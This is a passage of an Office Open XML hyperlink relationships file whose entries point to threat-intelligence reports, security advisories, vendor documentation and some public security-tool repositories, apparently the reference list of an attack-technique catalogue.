Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637" TargetMode="External"/><Relationship Id="rId2504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" TargetMode="External"/><Relationship Id="rId2711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://noticeofpleadings.com/phosphorus/files/Complaint.pdf" TargetMode="External"/><Relationship Id="rId2809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/solarstorm-supernova/" TargetMode="External"/><Relationship Id="rId1106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html" TargetMode="External"/><Relationship Id="rId1313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://labs.lastline.com/an-analysis-of-plugx" TargetMode="External"/><Relationship Id="rId1520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" TargetMode="External"/><Relationship Id="rId1965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zephrax/linux-pam-backdoor" TargetMode="External"/><Relationship Id="rId1618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8" TargetMode="External"/><Relationship Id="rId3040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x31.html" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" TargetMode="External"/><Relationship Id="rId2087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc826" TargetMode="External"/><Relationship Id="rId2294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" TargetMode="External"/><Relationship Id="rId680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf" TargetMode="External"/><Relationship Id="rId2154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" TargetMode="External"/><Relationship Id="rId2361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f" TargetMode="External"/><Relationship Id="rId2599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/dn280412" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/" TargetMode="External"/><Relationship Id="rId778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" TargetMode="External"/><Relationship Id="rId985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/" TargetMode="External"/><Relationship Id="rId1170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/" TargetMode="External"/><Relationship Id="rId2014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.passcape.com/index.php?section=docsys&amp;cmd=details&amp;id=23" TargetMode="External"/><Relationship Id="rId2221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt-trends-report-q1-2018/85280/" TargetMode="External"/><Relationship Id="rId2459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" TargetMode="External"/><Relationship Id="rId2666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/" TargetMode="External"/><Relationship Id="rId2873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Man-in-the-browser" TargetMode="External"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/resource/electrum/" TargetMode="External"/><Relationship Id="rId845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf" TargetMode="External"/><Relationship Id="rId1030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/command/filesystem/download.go" TargetMode="External"/><Relationship Id="rId1268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" TargetMode="External"/><Relationship Id="rId1475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/" TargetMode="External"/><Relationship Id="rId1682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx" TargetMode="External"/><Relationship Id="rId2319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/" TargetMode="External"/><Relationship Id="rId2526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc732952.aspx" TargetMode="External"/><Relationship Id="rId2733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/TA18-106A" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking" TargetMode="External"/><Relationship Id="rId705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" TargetMode="External"/><Relationship Id="rId1128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110" TargetMode="External"/><Relationship Id="rId1335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/" TargetMode="External"/><Relationship Id="rId1542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor" TargetMode="External"/><Relationship Id="rId1987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" TargetMode="External"/><Relationship Id="rId2940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" TargetMode="External"/><Relationship Id="rId912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" TargetMode="External"/><Relationship Id="rId1847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.morphisec.com/fin7-attacks-restaurant-industry" TargetMode="External"/><Relationship Id="rId2800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/" TargetMode="External"/><Relationship Id="rId1402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/" TargetMode="External"/><Relationship Id="rId1707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" TargetMode="External"/><Relationship Id="rId3062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a" TargetMode="External"/><Relationship Id="rId1914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/" TargetMode="External"/><Relationship Id="rId2176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051" TargetMode="External"/><Relationship Id="rId2383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/" TargetMode="External"/><Relationship Id="rId2590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/bash/trap.html" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.aquasec.com/malicious-container-image-docker-container-host" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.cisco.com/security/talos/threat-spotlight-group-72" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/file/1080281/download" TargetMode="External"/><Relationship Id="rId1192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html" TargetMode="External"/><Relationship Id="rId2036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" TargetMode="External"/><Relationship Id="rId2243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf" TargetMode="External"/><Relationship Id="rId2450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&amp;tabid=2" TargetMode="External"/><Relationship Id="rId2688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" TargetMode="External"/><Relationship Id="rId2895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.commandfive.com/papers/C5_APT_SKHack.pdf" TargetMode="External"/><Relationship Id="rId867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html" TargetMode="External"/><Relationship Id="rId1052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellEmpire/Empire" TargetMode="External"/><Relationship Id="rId1497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000" TargetMode="External"/><Relationship Id="rId2103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" TargetMode="External"/><Relationship Id="rId2310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/" TargetMode="External"/><Relationship Id="rId2548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" TargetMode="External"/><Relationship Id="rId2755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" TargetMode="External"/><Relationship Id="rId2962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js" TargetMode="External"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" TargetMode="External"/><Relationship Id="rId934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware" TargetMode="External"/><Relationship Id="rId1357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/" TargetMode="External"/><Relationship Id="rId1564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017" TargetMode="External"/><Relationship Id="rId1771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" TargetMode="External"/><Relationship Id="rId2408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments" TargetMode="External"/><Relationship Id="rId2615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html" TargetMode="External"/><Relationship Id="rId2822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html" TargetMode="External"/><Relationship Id="rId1217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" TargetMode="External"/><Relationship Id="rId1424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/" TargetMode="External"/><Relationship Id="rId1631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" TargetMode="External"/><Relationship Id="rId1869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" TargetMode="External"/><Relationship Id="rId3084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" TargetMode="External"/><Relationship Id="rId1729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull" TargetMode="External"/><Relationship Id="rId1936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning" TargetMode="External"/><Relationship Id="rId2198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windowsitpro.com/windows/netexe-reference" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" TargetMode="External"/><Relationship Id="rId2058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" TargetMode="External"/><Relationship Id="rId2265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/cobalt-illusion" TargetMode="External"/><Relationship Id="rId3011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.7-zip.org/" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blackhillsinfosec.com/?p=4645" TargetMode="External"/><Relationship Id="rId791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do" TargetMode="External"/><Relationship Id="rId889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html" TargetMode="External"/><Relationship Id="rId1074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard" TargetMode="External"/><Relationship Id="rId2472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" TargetMode="External"/><Relationship Id="rId2777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/who-is-ember-bear/" TargetMode="External"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant" TargetMode="External"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" TargetMode="External"/><Relationship Id="rId1281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/" TargetMode="External"/><Relationship Id="rId1379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/" TargetMode="External"/><Relationship Id="rId1586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" TargetMode="External"/><Relationship Id="rId2125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" TargetMode="External"/><Relationship Id="rId2332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219" TargetMode="External"/><Relationship Id="rId2984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" TargetMode="External"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/bash" TargetMode="External"/><Relationship Id="rId956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/instances/create-start-instance" TargetMode="External"/><Relationship Id="rId1141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html" TargetMode="External"/><Relationship Id="rId1239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" TargetMode="External"/><Relationship Id="rId1793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" TargetMode="External"/><Relationship Id="rId2637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" TargetMode="External"/><Relationship Id="rId2844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://global.ahnlab.com/global/upload/download/techreport/%5bAnalysis_Report%5dOperation%20Kabar%20Cobra.pdf" TargetMode="External"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" TargetMode="External"/><Relationship Id="rId1001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile" TargetMode="External"/><Relationship Id="rId1446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" TargetMode="External"/><Relationship Id="rId1653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)" TargetMode="External"/><Relationship Id="rId1860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/" TargetMode="External"/><Relationship Id="rId2704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services" TargetMode="External"/><Relationship Id="rId2911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec" TargetMode="External"/><Relationship Id="rId1306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/" TargetMode="External"/><Relationship Id="rId1513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app" TargetMode="External"/><Relationship Id="rId1720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Gerenios/AADInternals" TargetMode="External"/><Relationship Id="rId1818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection" TargetMode="External"/><Relationship Id="rId3033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/pdf/2102.04796.pdf" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/fox-kitten/" TargetMode="External"/><Relationship Id="rId2287" 